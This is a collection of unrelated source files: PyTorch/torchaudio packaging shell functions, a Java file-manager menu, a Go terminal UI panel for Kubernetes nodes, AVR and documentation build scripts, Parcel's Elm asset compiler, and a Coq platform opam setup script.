      3.9) python_abi=cp39-cp39 ;;
      3.10) python_abi=cp310-cp310 ;;
      *)
        echo "Unrecognized PYTHON_VERSION=$PYTHON_VERSION"
        exit 1
        ;;
    esac
    export PATH="/opt/python/$python_abi/bin:$PATH"
  fi
}
# Install with pip a bit more robustly than the default
pip_install() {
  # Forward all arguments to pip install, wrapped in retry for flaky
  # network/index failures; --progress-bar off keeps CI logs clean.
  retry pip install --progress-bar off "$@"
}
# Install torch with pip, respecting PYTORCH_VERSION, and record the installed
# version into PYTORCH_VERSION, if applicable
# Install torch with pip. If PYTORCH_VERSION is unset, install the nightly
# matching WHEEL_DIR (set by setup_cuda) and record what got installed back
# into PYTORCH_VERSION; otherwise install the pinned version.
setup_pip_pytorch_version() {
  if [[ -z "$PYTORCH_VERSION" ]]; then
    # Install latest prerelease version of torch, per our nightlies, consistent
    # with the requested cuda version
    pip_install --pre torch -f "https://download.pytorch.org/whl/nightly/${WHEEL_DIR}torch_nightly.html"
    # CUDA and CPU are ABI compatible on the CPU-only parts, so strip in this case
    # (the sed drops any "+cuXXX" local-version suffix from `pip show`).
    export PYTORCH_VERSION="$(pip show torch | grep ^Version: | sed 's/Version: *//' | sed 's/+.\+//')"
  else
    # Pinned version: look in both the stable index and the upload channel.
    pip_install "torch==$PYTORCH_VERSION$PYTORCH_VERSION_SUFFIX" \
      -f https://download.pytorch.org/whl/torch_stable.html \
      -f "https://download.pytorch.org/whl/${UPLOAD_CHANNEL}/torch_${UPLOAD_CHANNEL}.html"
  fi
}
# Fill PYTORCH_VERSION with the latest conda nightly version, and
# CONDA_CHANNEL_FLAGS with appropriate flags to retrieve these versions
#
# You MUST have populated PYTORCH_VERSION_SUFFIX before hand.
# Compute the conda pytorch constraints. Requires PYTORCH_VERSION_SUFFIX to
# be populated beforehand (see comment above).
setup_conda_pytorch_constraint() {
  CONDA_CHANNEL_FLAGS="${CONDA_CHANNEL_FLAGS}"
  if [[ -z "$PYTORCH_VERSION" ]]; then
    export CONDA_CHANNEL_FLAGS="${CONDA_CHANNEL_FLAGS} -c pytorch-nightly"
    # Query the newest nightly and strip any "+local" suffix from it.
    export PYTORCH_VERSION="$(conda search --json 'pytorch[channel=pytorch-nightly]' | python -c "import sys, json, re; print(re.sub(r'\\+.*$', '', json.load(sys.stdin)['pytorch'][-1]['version']))")"
  else
    export CONDA_CHANNEL_FLAGS="${CONDA_CHANNEL_FLAGS} -c pytorch -c pytorch-test -c pytorch-nightly"
  fi
  # Both constraints are emitted as meta.yaml requirement lines ("- pytorch==...").
  if [[ "$CU_VERSION" == cpu ]]; then
    # CPU: only the build-time constraint carries the +cpu suffix.
    export CONDA_PYTORCH_BUILD_CONSTRAINT="- pytorch==$PYTORCH_VERSION${PYTORCH_VERSION_SUFFIX}"
    export CONDA_PYTORCH_CONSTRAINT="- pytorch==$PYTORCH_VERSION"
  else
    export CONDA_PYTORCH_BUILD_CONSTRAINT="- pytorch==${PYTORCH_VERSION}${PYTORCH_VERSION_SUFFIX}"
    export CONDA_PYTORCH_CONSTRAINT="- pytorch==${PYTORCH_VERSION}${PYTORCH_VERSION_SUFFIX}"
  fi
  # TODO: Remove me later, see https://github.com/pytorch/pytorch/issues/62424 for more details
  if [[ "$(uname)" == Darwin ]]; then
    # Use less than equal to avoid version conflict in python=3.6 environment
    export CONDA_EXTRA_BUILD_CONSTRAINT="- mkl<=2021.2.0"
  fi
}
# Translate CUDA_VERSION into CUDA_CUDATOOLKIT_CONSTRAINT
# Translate CU_VERSION into CONDA_CUDATOOLKIT_CONSTRAINT (a meta.yaml
# requirement line) and pick the matching CONDA_BUILD_VARIANT.
setup_conda_cudatoolkit_constraint() {
  export CONDA_BUILD_VARIANT="cuda"
  if [[ "$(uname)" == Darwin ]]; then
    # No CUDA on macOS: always the CPU variant, no toolkit constraint.
    export CONDA_BUILD_VARIANT="cpu"
    return 0
  fi
  # Map CU_VERSION onto a half-open cudatoolkit range [lo, hi).
  local lo hi
  case "$CU_VERSION" in
    cu115) lo=11.5 hi=11.6 ;;
    cu113) lo=11.3 hi=11.4 ;;
    cu112) lo=11.2 hi=11.3 ;;
    cu111) lo=11.1 hi=11.2 ;;
    cu110) lo=11.0 hi=11.1 ;;
    cu102) lo=10.2 hi=10.3 ;;
    cu101) lo=10.1 hi=10.2 ;;
    cu100) lo=10.0 hi=10.1 ;;
    cu92)  lo=9.2  hi=9.3 ;;
    cpu)
      export CONDA_CUDATOOLKIT_CONSTRAINT=""
      export CONDA_BUILD_VARIANT="cpu"
      return 0
      ;;
    *)
      echo "Unrecognized CU_VERSION=$CU_VERSION"
      exit 1
      ;;
  esac
  # The trailing "# [not osx]" selector is consumed by conda-build.
  export CONDA_CUDATOOLKIT_CONSTRAINT="- cudatoolkit >=$lo,<$hi # [not osx]"
}
# Build the proper compiler package before building the final package
# Windows (msys) only: build the VS toolchain conda package first and copy
# its conda_build_config.yaml next to the torchaudio recipe so the final
# package is built with the same compiler configuration.
setup_visual_studio_constraint() {
  if [[ "$OSTYPE" == "msys" ]]; then
    export VSTOOLCHAIN_PACKAGE=vs2019
    export VSDEVCMD_ARGS=''
    # $CONDA_CHANNEL_FLAGS is intentionally unquoted: it holds multiple
    # "-c <channel>" words that must be split.
    conda build $CONDA_CHANNEL_FLAGS --no-anaconda-upload packaging/$VSTOOLCHAIN_PACKAGE
    cp packaging/$VSTOOLCHAIN_PACKAGE/conda_build_config.yaml packaging/torchaudio/conda_build_config.yaml
  fi
}
|
package lockme;
import java.io.File;
import java.util.Scanner;
public class VirtualKeyRepositoryMenu {
static int choice=0;
public static void main(String[] args) {
FileOperations fo=new FileOperations();
Scanner sc=new Scanner(System.in);
System.out.println("********************************************************");
System.out.println("\t\tWelcome to locked me");
System.out.println("********************************************************");
do{
System.out.println("\t1.Create Folder");
System.out.println("\t2.Add Files to the existing folder");
System.out.println("\t3.Add Files to the new folder");
System.out.println("\t4.Delete Files");
System.out.println("\t5.Search Files");
System.out.println("\t6.Sort");
System.out.println("\t7.Exit");
System.out.println("********************************************************");
System.out.println("Enter your choice here:");
choice=sc.nextInt();
if(choice>=1)
{
if(choice==1)
fo.CreateFolder();
if(choice==2)
fo.existsaddfile();
if(choice==3)
fo.newadd();
if(choice==4)
fo.deletefile();
if(choice==5)
fo.search();
if(choice==7)
{
System.out.println("Thank you for using Virtual Key repository. Visit again!");
System.out.println("\t\t*****");
System.exit(0);
}
if(choice==6)
fo.sortingfile();
}
}
while(true);
}
} |
# Regenerate api.md from godocdown output of the client, utils and
# internal_contract packages.
cd "$(dirname "$0")"
# Temporarily rename the interface files so godocdown skips them.
mv ./interface.go ./interface.go.tmd
mv ./interface_mock.go ./interface_mock.go.tmd
godocdown -o client.md
cd ./utils && godocdown -o ../utils.md && cd ..
cd ./contract_meta/internal_contract && godocdown -o ../../internal_contract.md && cd ../..
cat client.md utils.md internal_contract.md > tmp.md
# Restore the interface files.
mv ./interface.go.tmd ./interface.go
mv ./interface_mock.go.tmd ./interface_mock.go
# NOTE(review): `sed -i ""` is the BSD/macOS form; GNU sed needs plain -i,
# so this script presumably targets macOS -- confirm before running on Linux.
sed -i "" 's/## Usage//g' tmp.md
sed -i "" 's/#### type/### type/g' tmp.md
# Drop the intermediate per-package files and publish the combined doc.
rm -f client.md
rm -f utils.md
rm -f internal_contract.md
mv ./tmp.md ./api.md
# read -r -p "The api.md will be overwritten, are you sure ? [y/n] " input
# case $input in
#     [yY][eE][sS]|[yY])
# 		echo "Yes"
#         mv ./tmp.md ./api.md
#         ;;
#     [nN][oO]|[nN])
# 		echo "No"
#         ;;
#     *)
# 		echo "Invalid input..."
#         rm ./tmp.md
#         exit 1
#         ;;
# esac
package overview
import (
"fmt"
"github.com/gdamore/tcell/v2"
"github.com/rivo/tview"
"github.com/vladimirvivien/ktop/application"
"github.com/vladimirvivien/ktop/ui"
"github.com/vladimirvivien/ktop/views/model"
"k8s.io/apimachinery/pkg/api/resource"
)
// nodePanel renders the cluster-node overview as a tview table inside a
// bordered flex container.
type nodePanel struct {
	app      *application.Application // shared app handle (provides the k8s client)
	title    string                   // panel title shown on the border
	root     *tview.Flex              // outer container returned by GetRootView
	children []tview.Primitive        // child primitives exposed via GetChildrenViews
	listCols []string                 // header titles captured by DrawHeader for redraws
	list     *tview.Table             // the node table itself
}
// NewNodePanel builds a node overview panel backed by a fresh tview table
// and performs the initial layout.
func NewNodePanel(app *application.Application, title string) ui.Panel {
	p := &nodePanel{app: app, title: title, list: tview.NewTable()}
	p.Layout(nil)
	return p
}
// GetTitle returns the panel's display title.
func (p *nodePanel) GetTitle() string {
	return p.title
}
// Layout (re)builds the table and its flex container. The argument is
// unused; it exists to satisfy the ui.Panel interface.
func (p *nodePanel) Layout(_ interface{}) {
	// Pin the header row while scrolling.
	p.list.SetFixed(1, 0)
	p.list.SetBorder(false)
	p.list.SetBorders(false)
	// Rows become selectable (with a highlight style) only while the
	// table has focus.
	p.list.SetFocusFunc(func() {
		p.list.SetSelectable(true,false)
		p.list.SetSelectedStyle(tcell.StyleDefault.Background(tcell.ColorYellow).Foreground(tcell.ColorBlue))
	})
	p.list.SetBlurFunc(func() {
		p.list.SetSelectable(false,false)
	})
	p.root = tview.NewFlex().SetDirection(tview.FlexRow).
		AddItem(p.list, 0, 1, true)
	p.root.SetBorder(true)
	p.root.SetTitle(p.GetTitle())
	p.root.SetTitleAlign(tview.AlignLeft)
}
// DrawHeader renders the header row. data must be a []string of column
// titles; any other type is a programming error and panics.
func (p *nodePanel) DrawHeader(data interface{}) {
	cols, ok := data.([]string)
	if !ok {
		panic(fmt.Sprintf("nodePanel.DrawHeader got unexpected data type %T", data))
	}
	// legend column
	p.list.SetCell(0, 0,
		tview.NewTableCell("").
			SetTextColor(tcell.ColorWhite).
			SetAlign(tview.AlignCenter).
			SetBackgroundColor(tcell.ColorDarkGreen).
			SetMaxWidth(1).
			SetExpansion(0).
			SetSelectable(false),
	)
	// Remember the titles so Clear() can redraw the header later.
	p.listCols = cols
	for i, col := range p.listCols {
		pos := i + 1 // shift right: column 0 is the legend
		p.list.SetCell(0, pos,
			tview.NewTableCell(col).
				SetTextColor(tcell.ColorWhite).
				SetAlign(tview.AlignLeft).
				SetBackgroundColor(tcell.ColorDarkGreen).
				SetExpansion(100).
				SetSelectable(false),
		)
	}
}
// DrawBody renders one table row per node. data must be a []model.NodeModel;
// any other type is a programming error and panics.
// When the metrics API is unavailable, the CPU/memory columns fall back to
// the requested (reserved) pod resources instead of live usage.
func (p *nodePanel) DrawBody(data interface{}) {
	nodes, ok := data.([]model.NodeModel)
	if !ok {
		panic(fmt.Sprintf("NodePanel.DrawBody: unexpected type %T", data))
	}
	client := p.app.GetK8sClient()
	// AssertMetricsAvailable returns a non-nil error when metrics cannot
	// be queried (fixes the original "metricsDiabled" misspelling).
	metricsDisabled := client.AssertMetricsAvailable() != nil
	var cpuRatio, memRatio ui.Ratio
	var cpuGraph, memGraph string
	var cpuMetrics, memMetrics string
	// Bar-graph color thresholds: green from 0%, yellow from 50%, red from 90%.
	colorKeys := ui.ColorKeys{0: "green", 50: "yellow", 90: "red"}
	for i, node := range nodes {
		i++ // offset for header-row
		controlLegend := ""
		if node.Controller {
			controlLegend = fmt.Sprintf("%c", ui.Icons.TrafficLight)
		}
		// legend: marks control-plane nodes
		p.list.SetCell(
			i, 0,
			&tview.TableCell{
				Text:          controlLegend,
				Color:         tcell.ColorOrangeRed,
				Align:         tview.AlignCenter,
				NotSelectable: true,
			},
		)
		// name
		p.list.SetCell(
			i, 1,
			&tview.TableCell{
				Text:  node.Name,
				Color: tcell.ColorYellow,
				Align: tview.AlignLeft,
			},
		)
		// status
		p.list.SetCell(
			i, 2,
			&tview.TableCell{
				Text:  node.Status,
				Color: tcell.ColorYellow,
				Align: tview.AlignLeft,
			},
		)
		// age
		p.list.SetCell(
			i, 3,
			&tview.TableCell{
				Text:  node.TimeSinceStart,
				Color: tcell.ColorYellow,
				Align: tview.AlignLeft,
			},
		)
		// kubelet version
		p.list.SetCell(
			i, 4,
			&tview.TableCell{
				Text:  node.KubeletVersion,
				Color: tcell.ColorYellow,
				Align: tview.AlignLeft,
			},
		)
		// internal/external IP
		p.list.SetCell(
			i, 5,
			&tview.TableCell{
				Text:  fmt.Sprintf("%s/%s", node.InternalIP, node.ExternalIP),
				Color: tcell.ColorYellow,
				Align: tview.AlignLeft,
			},
		)
		// OS image/architecture
		p.list.SetCell(
			i, 6,
			&tview.TableCell{
				Text:  fmt.Sprintf("%s/%s", node.OSImage, node.Architecture),
				Color: tcell.ColorYellow,
				Align: tview.AlignLeft,
			},
		)
		// pods/images counts
		p.list.SetCell(
			i, 7,
			&tview.TableCell{
				Text:  fmt.Sprintf("%d/%d", node.PodsCount, node.ContainerImagesCount),
				Color: tcell.ColorYellow,
				Align: tview.AlignLeft,
			},
		)
		// Disk
		p.list.SetCell(
			i, 8,
			&tview.TableCell{
				Text:  fmt.Sprintf("%dGi", node.AllocatableStorageQty.ScaledValue(resource.Giga)),
				Color: tcell.ColorYellow,
				Align: tview.AlignLeft,
			},
		)
		if metricsDisabled {
			// No metrics-server: show requested-vs-allocatable resources.
			cpuRatio = ui.GetRatio(float64(node.RequestedPodCpuQty.MilliValue()), float64(node.AllocatableCpuQty.MilliValue()))
			cpuGraph = ui.BarGraph(10, cpuRatio, colorKeys)
			cpuMetrics = fmt.Sprintf(
				"[white][%s[white]] %dm/%dm (%1.0f%%)",
				cpuGraph, node.RequestedPodCpuQty.MilliValue(), node.AllocatableCpuQty.MilliValue(), cpuRatio*100,
			)
			memRatio = ui.GetRatio(float64(node.RequestedPodMemQty.MilliValue()), float64(node.AllocatableMemQty.MilliValue()))
			memGraph = ui.BarGraph(10, memRatio, colorKeys)
			memMetrics = fmt.Sprintf(
				"[white][%s[white]] %dGi/%dGi (%1.0f%%)",
				memGraph, node.RequestedPodMemQty.ScaledValue(resource.Giga), node.AllocatableMemQty.ScaledValue(resource.Giga), memRatio*100,
			)
		} else {
			// Metrics available: show live usage-vs-allocatable resources.
			cpuRatio = ui.GetRatio(float64(node.UsageCpuQty.MilliValue()), float64(node.AllocatableCpuQty.MilliValue()))
			cpuGraph = ui.BarGraph(10, cpuRatio, colorKeys)
			cpuMetrics = fmt.Sprintf(
				"[white][%s[white]] %dm/%dm (%1.0f%%)",
				cpuGraph, node.UsageCpuQty.MilliValue(), node.AllocatableCpuQty.MilliValue(), cpuRatio*100,
			)
			memRatio = ui.GetRatio(float64(node.UsageMemQty.MilliValue()), float64(node.AllocatableMemQty.MilliValue()))
			memGraph = ui.BarGraph(10, memRatio, colorKeys)
			memMetrics = fmt.Sprintf(
				"[white][%s[white]] %dGi/%dGi (%1.0f%%)",
				memGraph, node.UsageMemQty.ScaledValue(resource.Giga), node.AllocatableMemQty.ScaledValue(resource.Giga), memRatio*100,
			)
		}
		p.list.SetCell(
			i, 9,
			&tview.TableCell{
				Text:  cpuMetrics,
				Color: tcell.ColorYellow,
				Align: tview.AlignLeft,
			},
		)
		p.list.SetCell(
			i, 10,
			&tview.TableCell{
				Text:  memMetrics,
				Color: tcell.ColorYellow,
				Align: tview.AlignLeft,
			},
		)
	}
}
// DrawFooter is a no-op: the node panel renders no footer content.
func (p *nodePanel) DrawFooter(data interface{}) {}
// Clear empties the table, rebuilds the layout, and redraws the header
// using the column titles captured by the last DrawHeader call.
func (p *nodePanel) Clear() {
	p.list.Clear()
	p.Layout(nil)
	p.DrawHeader(p.listCols)
}
// GetRootView returns the outer flex container for embedding in the app UI.
func (p *nodePanel) GetRootView() tview.Primitive {
	return p.root
}
// GetChildrenViews returns the panel's child primitives (never populated by
// this panel itself; kept for the ui.Panel interface).
func (p *nodePanel) GetChildrenViews() []tview.Primitive {
	return p.children
}
|
# Build the test_pwm sketch against the local AVR core with the Arduino
# toolchain (atmega2560 @ 16 MHz).
OUT=bin-old
CORE=./core
INC="-Icore"
GCC=/Applications/Arduino-1.8.9.app/Contents/Java/hardware/tools/avr/bin

# Abort on the first failed compile/link step instead of cascading errors.
set -e

# Make sure the output directory exists, and remove any stale archive:
# `ar rcs` appends to an existing core.a, so old objects could leak in.
mkdir -p "$OUT"
rm -f "$OUT/core.a"

$GCC/avr-gcc --version
set -x
# Sketch
$GCC/avr-g++ -c -g -Os -w -std=gnu++11 -fpermissive -fno-exceptions -ffunction-sections -fdata-sections -fno-threadsafe-statics -Wno-error=narrowing -MMD -flto -mmcu=atmega2560 -DF_CPU=16000000L -DARDUINO=10810 -DARDUINO_AVR_MEGA2560 -DARDUINO_ARCH_AVR $INC test_pwm.ino.cpp -o $OUT/test_pwm.ino.cpp.o
# Core
$GCC/avr-gcc -c -g -Os -w -std=gnu11 -ffunction-sections -fdata-sections -MMD -flto -fno-fat-lto-objects -mmcu=atmega2560 -DF_CPU=16000000L -DARDUINO=10810 -DARDUINO_AVR_MEGA2560 -DARDUINO_ARCH_AVR $INC $CORE/wiring_analog.c -o $OUT/wiring_analog.c.o
$GCC/avr-gcc -c -g -Os -w -std=gnu11 -ffunction-sections -fdata-sections -MMD -flto -fno-fat-lto-objects -mmcu=atmega2560 -DF_CPU=16000000L -DARDUINO=10810 -DARDUINO_AVR_MEGA2560 -DARDUINO_ARCH_AVR $INC $CORE/wiring_digital.c -o $OUT/wiring_digital.c.o
$GCC/avr-gcc -c -g -Os -w -std=gnu11 -ffunction-sections -fdata-sections -MMD -flto -fno-fat-lto-objects -mmcu=atmega2560 -DF_CPU=16000000L -DARDUINO=10810 -DARDUINO_AVR_MEGA2560 -DARDUINO_ARCH_AVR $INC $CORE/wiring.c -o $OUT/wiring.c.o
$GCC/avr-g++ -c -g -Os -w -std=gnu++11 -fpermissive -fno-exceptions -ffunction-sections -fdata-sections -fno-threadsafe-statics -Wno-error=narrowing -MMD -flto -mmcu=atmega2560 -DF_CPU=16000000L -DARDUINO=10810 -DARDUINO_AVR_MEGA2560 -DARDUINO_ARCH_AVR $INC $CORE/main.cpp -o $OUT/main.cpp.o
# Core Lbrary
$GCC/avr-gcc-ar rcs $OUT/core.a $OUT/wiring_analog.c.o
$GCC/avr-gcc-ar rcs $OUT/core.a $OUT/wiring_digital.c.o
$GCC/avr-gcc-ar rcs $OUT/core.a $OUT/wiring.c.o
$GCC/avr-gcc-ar rcs $OUT/core.a $OUT/main.cpp.o
# Link
$GCC/avr-gcc -w -Os -g -flto -fuse-linker-plugin -Wl,--gc-sections,--relax -mmcu=atmega2560 -o $OUT/test_pwm.ino.elf $OUT/test_pwm.ino.cpp.o $OUT/core.a -L$OUT -lm
$GCC/avr-objcopy -O ihex -R .eeprom $OUT/test_pwm.ino.elf $OUT/test_pwm.ino.hex
$GCC/avr-size $OUT/test_pwm.ino.elf
$GCC/avr-objdump -SC $OUT/test_pwm.ino.elf >$OUT/test_pwm.ino.lss
|
<reponame>ang-jason/fip_powerx_mini_projects-foxtrot<gh_stars>0
"use strict";
var _interopRequireDefault = require("@babel/runtime/helpers/interopRequireDefault");
var _asyncToGenerator2 = _interopRequireDefault(require("@babel/runtime/helpers/asyncToGenerator"));
const Asset = require('../Asset');
const commandExists = require('command-exists');
const localRequire = require('../utils/localRequire');
const _require = require('terser'),
minify = _require.minify;
const path = require('path');
const spawn = require('cross-spawn');
// NOTE(review): Babel-compiled output (_asyncToGenerator/iterator
// boilerplate); presumably generated from parcel's ElmAsset source --
// prefer fixing the original source over this artifact.
class ElmAsset extends Asset {
  constructor(name, options) {
    super(name, options);
    this.type = 'js'; // Elm compiles to JavaScript output
  }
  // Compile the .elm entry file to a JS string. Installs elm locally when
  // it is not on PATH, creates elm.json if missing, and applies debug/
  // optimize/HMR transforms based on the bundler options.
  parse() {
    var _this = this;
    return (0, _asyncToGenerator2.default)(function* () {
      let options = {
        cwd: path.dirname(_this.name)
      }; // If elm is not installed globally, install it locally.
      try {
        yield commandExists('elm');
      } catch (err) {
        yield localRequire('elm', _this.name);
        options.pathToElm = path.join(path.dirname(require.resolve('elm')), 'bin', 'elm');
      }
      _this.elm = yield localRequire('node-elm-compiler', _this.name); // Ensure that an elm.json file exists, and initialize one if not.
      let elmConfig = yield _this.getConfig(['elm.json'], {
        load: false
      });
      if (!elmConfig) {
        yield _this.createElmConfig(options); // Ensure we are watching elm.json for changes
        yield _this.getConfig(['elm.json'], {
          load: false
        });
      }
      // Debug runtime only outside production; optimize when minifying.
      options.debug = !_this.options.production;
      if (_this.options.minify) {
        options.optimize = true;
      }
      let compiled = yield _this.elm.compileToString(_this.name, options);
      _this.contents = compiled.toString();
      if (_this.options.hmr) {
        // elm-hot injects hot-module-reload support into the compiled JS.
        let _ref = yield localRequire('elm-hot', _this.name),
            inject = _ref.inject;
        _this.contents = inject(_this.contents);
      }
    })();
  }
  // Register every Elm module the entry file imports so edits to any of
  // them trigger a rebuild of this asset.
  collectDependencies() {
    var _this2 = this;
    return (0, _asyncToGenerator2.default)(function* () {
      let dependencies = yield _this2.elm.findAllDependencies(_this2.name);
      var _iteratorNormalCompletion = true;
      var _didIteratorError = false;
      var _iteratorError = undefined;
      try {
        for (var _iterator = dependencies[Symbol.iterator](), _step; !(_iteratorNormalCompletion = (_step = _iterator.next()).done); _iteratorNormalCompletion = true) {
          let dependency = _step.value;
          _this2.addDependency(dependency, {
            includedInParent: true
          });
        }
      } catch (err) {
        _didIteratorError = true;
        _iteratorError = err;
      } finally {
        try {
          if (!_iteratorNormalCompletion && _iterator.return != null) {
            _iterator.return();
          }
        } finally {
          if (_didIteratorError) {
            throw _iteratorError;
          }
        }
      }
    })();
  }
  // Run `elm init` (auto-answering "y") to create elm.json; rejects when
  // the process fails to spawn or exits non-zero.
  createElmConfig(options) {
    return (0, _asyncToGenerator2.default)(function* () {
      let cp = spawn(options.pathToElm || 'elm', ['init']);
      cp.stdin.write('y\n');
      return new Promise((resolve, reject) => {
        cp.on('error', reject);
        cp.on('close', function (code) {
          if (code !== 0) {
            return reject(new Error('elm init failed.'));
          }
          return resolve();
        });
      });
    })();
  }
  // Return the compiled JS keyed by asset type, minified when requested.
  generate() {
    var _this3 = this;
    return (0, _asyncToGenerator2.default)(function* () {
      let output = _this3.contents;
      if (_this3.options.minify) {
        output = pack(output);
      }
      return {
        [_this3.type]: output
      }; // Recommended minification
      // Based on:
      // - http://elm-lang.org/0.19.0/optimize
      function pack(source) {
        let options = {
          compress: {
            keep_fargs: false,
            passes: 2,
            // Elm's currying/application helpers are side-effect free, so
            // terser may drop unused calls to them.
            pure_funcs: ['F2', 'F3', 'F4', 'F5', 'F6', 'F7', 'F8', 'F9', 'A2', 'A3', 'A4', 'A5', 'A6', 'A7', 'A8', 'A9'],
            pure_getters: true,
            unsafe: true,
            unsafe_comps: true
          },
          mangle: true,
          rename: false
        };
        // NOTE(review): synchronous minify + result.error is the terser v4
        // API; terser v5 returns a Promise -- confirm the pinned version.
        let result = minify(source, options);
        if (result.error) {
          throw result.error;
        }
        return result.code;
      }
    })();
  }
}
module.exports = ElmAsset; |
#!/bin/bash
###################### COPYRIGHT/COPYLEFT ######################
# (C) 2020 Michael Soegtrop
# Released to the public under the
# Creative Commons CC0 1.0 Universal License
# See https://creativecommons.org/publicdomain/zero/1.0/legalcode.txt
###################### INSTALL OPAM #####################
# Download and run the official opam install script.
# In COQREGTESTING mode the installer runs unattended (default answers piped
# in, via sudo); otherwise it runs interactively. The downloaded script is
# removed afterwards.
function run_opam_installer {
  check_command_available curl
  curl -sL https://raw.githubusercontent.com/ocaml/opam/master/shell/install.sh > opam_installer.sh
  chmod a+x opam_installer.sh
  if [[ "${COQREGTESTING:-n}" == y ]]
  then
    sudo sh -c 'yes "" | ./opam_installer.sh'
  else
    ./opam_installer.sh
  fi
  rm opam_installer.sh
}
# Install opam if it is missing; otherwise verify the installed version is
# at least 2.0.5. (Typos fixed: "unsopported" -> "unsupported",
# "ininstall" -> "uninstall".)
if ! command -v opam &> /dev/null
then
  echo "===== INSTALLING OPAM ====="
  if [[ "$OSTYPE" == linux* ]]
  then
    # On Linux use the opam install script - Linux has too many variants.
    run_opam_installer
  elif [[ "$OSTYPE" == darwin* ]]
  then
    # On macOS if a package manager is installed, use it - otherwise use the opam install script.
    # The advantage of using a package manager is that opam is updated automatically.
    if command -v port &> /dev/null
    then
      sudo port install opam
    elif command -v brew &> /dev/null
    then
      brew install opam
    else
      run_opam_installer
    fi
  elif [[ "$OSTYPE" == cygwin ]]
  then
    # We want MinGW cross - this requires a special opam
    wget https://github.com/fdopen/opam-repository-mingw/releases/download/0.0.0.2/opam$BITSIZE.tar.xz -O "opam$BITSIZE.tar.xz"
    tar -xf "opam$BITSIZE.tar.xz"
    bash opam$BITSIZE/install.sh --prefix "/usr/$(uname -m)-w64-mingw32/sys-root/mingw"
  else
    echo "ERROR: unsupported OS type '$OSTYPE'"
    return 1
  fi
  echo "OPAM is now $(command -v opam) with version $(opam --version)"
else
  echo "===== CHECKING VERSION OF INSTALLED OPAM ====="
  # Note: on some OSes 2.0.5 is the latest available version and I am not aware that this does not work.
  # The script is mostly tested with opam 2.0.7
  # See https://opam.ocaml.org/doc/Install.html
  if [ $(version_to_number $(opam --version)) -lt $(version_to_number 2.0.5) ]
  then
    echo "Your installed opam version $(opam --version) is older than 2.0.5."
    echo "This version of opam is not supported."
    echo "If you uninstall opam, this script will install the latest version."
    return 1
  else
    echo "Found opam $(opam --version) - good!"
  fi
fi
which opam
###################### CHECK SYSTEM SANDBOX VERSION #####################

# Decide whether opam's bubblewrap sandbox can be used on this system.
# NOTE: the variable name ENABLE_SANDOX is a historic misspelling of
# "SANDBOX"; kept as-is in case other scripts reference it.
# (Typos fixed in messages: "Ununtu", "clocal", "sefety", "dsiable".)
ENABLE_SANDOX=Y
COQ_PLATFORM_OPAM_INIT_EXTRA=""

if [[ "$OSTYPE" == linux* ]]
then
  if ! command -v bwrap &> /dev/null
  then
    echo "========================= BUBBLEWRAP SYSTEM SANDBOX ========================="
    echo "You do not have the sandbox system 'bubblewrap' installed."
    ENABLE_SANDOX=N
  else
    # This is the bwrap version on Ubuntu 18.04 LTS, which seems to work
    if [ $(version_to_number $(bwrap --version | cut -f 2 -d ' ')) -lt $(version_to_number 0.2.1) ]
    then
      echo "========================= BUBBLEWRAP SYSTEM SANDBOX ========================="
      echo "Your version of the sandbox system 'bubblewrap' is too old."
      echo "You have version $(bwrap --version | cut -f 2 -d ' ') but we need at least 0.2.1"
      ENABLE_SANDOX=N
    fi
  fi
  if [ $ENABLE_SANDOX == N ]
  then
    cat <<EOH
Updating or installing the bubblewrap sandbox on your system might be
difficult. Opam uses bubblewrap to make sure that make files access their
local build folders only, so that a gone wild "cd .. && rm -rf" in a
"make clean" does not erase your home folder. This is an extra safety measure
and it is not strictly required. You have probably run "make" in some open
source software build folder before without using a sandbox. Opam has this
extra measure because it runs a lot of builds for many software packages,
which increases the risk.
You can either cancel and try to install or upgrade bubblewrap to at least
version 0.2.1, or you can run opam without sandbox.
========================= BUBBLEWRAP SYSTEM SANDBOX =========================
EOH
    if [[ "${COQREGTESTING:-n}" == n ]]
    then
      ask_user_opt1_cancel "Disable sandbox (d) or cancel (c)?" dD "disable sandbox"
    fi
    COQ_PLATFORM_OPAM_INIT_EXTRA=--disable-sandboxing
  fi
fi
###################### INITIALIZE OPAM #####################

# Initialize opam's root once (detected via `opam var root`); skipped when
# opam is already initialized.
if ! opam var root &> /dev/null
then
  echo "===== INITIALIZING OPAM ====="
  if [[ "$OSTYPE" == cygwin ]]
  then
    # Init opam with windows specific default repo
    opam init --bare --shell-setup --enable-shell-hook --enable-completion --disable-sandboxing default 'https://github.com/fdopen/opam-repository-mingw.git#opam2'
  else
    opam init --bare --shell-setup --enable-shell-hook --enable-completion $COQ_PLATFORM_OPAM_INIT_EXTRA
  fi
else
  echo "===== opam already initialized ====="
fi
###################### CREATE OPAM SWITCH #####################

# Create the platform switch (with patch + Coq repos registered) unless it
# already exists.
if ! opam switch $COQ_PLATFORM_SWITCH_NAME 2>/dev/null
then
  echo "===== CREATE OPAM SWITCH ====="
  # Pick the OCaml compiler: MinGW variants on cygwin, vanilla elsewhere.
  if [[ "$OSTYPE" == cygwin ]]
  then
    if [ "`uname -m`" = "x86_64" ]; then
      COQ_PLATFORM_OCAML_VERSION="ocaml-variants.4.07.1+mingw64c"
    else
      COQ_PLATFORM_OCAML_VERSION="ocaml-variants.4.07.1+mingw32c"
    fi
  else
    COQ_PLATFORM_OCAML_VERSION='ocaml-base-compiler.4.07.1'
  fi
  # Register switch specific repo
  # This repo shall always be specific to this switch - so delete it if it exists
  $COQ_PLATFORM_TIME opam repo remove --all "patch$COQ_PLATFORM_SWITCH_NAME" || true
  $COQ_PLATFORM_TIME opam repo add --dont-select "patch$COQ_PLATFORM_SWITCH_NAME" "file://$OPAMPACKAGES"
  # Add the Coq repo - note: a repo can be added many times as long as the URL is the same
  $COQ_PLATFORM_TIME opam repo add --dont-select coq-core-dev "https://coq.inria.fr/opam/core-dev"
  $COQ_PLATFORM_TIME opam repo add --dont-select coq-extra-dev "https://coq.inria.fr/opam/extra-dev"
  $COQ_PLATFORM_TIME opam repo add --dont-select coq-released "https://coq.inria.fr/opam/released"
  # Create switch with the patch repo registered right away in case we need to patch OCaml
  $COQ_PLATFORM_TIME opam switch create $COQ_PLATFORM_SWITCH_NAME $COQ_PLATFORM_OCAML_VERSION --repositories="patch$COQ_PLATFORM_SWITCH_NAME",coq-core-dev,coq-extra-dev,coq-released,default
else
  echo "===== opam switch already exists ====="
fi
###################### SELECT OPAM SWITCH #####################

# Make the platform switch active for the rest of this script.
opam switch $COQ_PLATFORM_SWITCH_NAME
eval $(opam env)
echo === OPAM REPOSITORIES ===
opam repo list
echo === OPAM PACKAGES ===
opam list

# Cleanup old build artifacts for current switch ###
